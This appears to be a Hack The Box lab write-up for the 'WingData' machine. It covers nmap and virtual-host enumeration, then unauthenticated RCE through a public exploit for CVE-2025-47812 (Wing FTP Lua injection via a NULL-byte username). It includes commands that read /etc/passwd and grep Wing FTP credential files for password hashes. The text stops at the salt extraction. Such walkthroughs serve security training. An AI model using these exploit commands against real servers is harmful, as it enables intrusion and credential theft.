FTP

Hack The Box - Season 10 HTB WingData Writeup - Easy - Weekly - Feb 14th, 2026

1337 Sheets
1337 Sheets
·
Hack The Box - Season 10 HTB WingData Writeup - Easy - Weekly - Feb 14th, 2026

HackTheBox - WingData

Machine: WingData Difficulty: Esay

Tools Used: Nmap, ffuf, searchsploit, hashcat, Python, sshpass

Table of Contents

  1. Reconnaissance
  2. Foothold - CVE-2025-47812: Wing FTP Lua Injection RCE
  3. Lateral Movement - Credential Extraction & Hash Cracking
  4. Privilege Escalation - CVE-2025-4517: Python tarfile PATH_MAX Bypass
  5. Attack Chain Overview

Reconnaissance

Port Scanning

Starting with a comprehensive Nmap scan to map the attack surface:

$ nmap -A -sC -sS -v -p- --min-rate=1000 <TARGET_IP> -oN nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
|   256 [REDACTED] (ECDSA)
|_  256 [REDACTED] (ED25519)
80/tcp open  http    Apache httpd 2.4.66
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-title: WingData Solutions
|_http-server-header: Apache/2.4.66 
Service Info: Host: localhost; OS: Linux

Only two ports are exposed -- SSH on port 22 and Apache on port 80. The HTTP title reads "WingData Solutions," and the host resolves to wingdata.htb, which we add to /etc/hosts.

Virtual Host Enumeration

With only two ports and a web application in play, searching for hidden virtual hosts is a logical next step. Using ffuf against a subdomain wordlist while filtering out the default response:

$ ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt \
       -u http://wingdata.htb -H "Host: FUZZ.wingdata.htb" -t 1000 -c -fw 21

ftp                     [Status: 200, Size: 678, Words: 44, Lines: 10, Duration: 574ms]

A single virtual host surfaces: ftp.wingdata.htb. After adding it to /etc/hosts and navigating to it, the response headers reveal the software immediately:

Server: Wing FTP Server(Free Edition)

The login page at /login.html confirms we are dealing with Wing FTP Server, a commercial multi-protocol file server with an embedded Lua scripting engine. This detail about the Lua engine turns out to be critical.

Foothold

CVE-2025-47812 - Wing FTP Server Unauthenticated RCE via Lua Injection

Searching ExploitDB for Wing FTP Server vulnerabilities reveals EDB-52347, a public exploit for CVE-2025-47812 affecting versions up to and including 7.4.3.

$ searchsploit -m 52347
  Exploit: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
      URL: https://www.exploit-db.com/exploits/52347

Understanding the Vulnerability

The flaw exploits a discrepancy in how Wing FTP handles the username parameter during authentication:

  1. Login request: A POST is sent to /loginok.html with a username containing a NULL byte (%00) followed by injected Lua code.
  2. Authentication check: The internal C function c_CheckUser() truncates the string at the NULL byte, seeing only the legitimate username (e.g., anonymous). Since anonymous login is enabled, authentication succeeds.
  3. Session file creation: However, the session creation logic writes the full unsanitized username -- including the Lua payload -- into a session file on disk.
  4. Code execution trigger: When /dir.html is subsequently accessed with the session cookie (UID), the server parses the session file and executes the embedded Lua code, granting arbitrary command execution.

The injected Lua payload uses io.popen() to run OS commands and returns the output in the HTTP response body, preceding the normal XML directory listing.

Exploitation

$ python3 52347.py -u http://ftp.wingdata.htb -c 'id'

uid=1000(wingftp) gid=1000(wingftp) groups=1000(wingftp),24(cdrom),25(floppy),
29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

We have unauthenticated remote code execution as the wingftp service account. Enumerating the system users:

$ python3 52347.py -u http://ftp.wingdata.htb -c 'cat /etc/passwd | grep bash$'

root:x:0:0:root:/root:/bin/bash
wingftp:x:1000:1000:WingFTP Daemon User,,,:/opt/wingftp:/bin/bash
wacky:x:1001:1001::/home/wacky:/bin/bash

Three users have interactive shells: root, wingftp, and wacky. The user flag sits in /home/wacky/, but wingftp does not have read access to it. We need to pivot laterally to wacky.

Lateral Movement

Extracting Wing FTP Credential Hashes

Wing FTP Server stores user credentials in XML configuration files under its data directory. Using our RCE, we can read them directly:

$ python3 52347.py -u http://ftp.wingdata.htb \
    -c 'grep -ir Password /opt/wftpserver/Data/'

/opt/wftpserver/Data/_ADMINISTRATOR/admins.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/maria.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/steve.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/wacky.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/anonymous.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/john.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/settings.xml:
    <EnablePasswordSalting>1</EnablePasswordSalting>

Six user hashes recovered across the administrator and domain user configurations. The settings.xml file indicates that password salting is enabled. Extracting the salt value: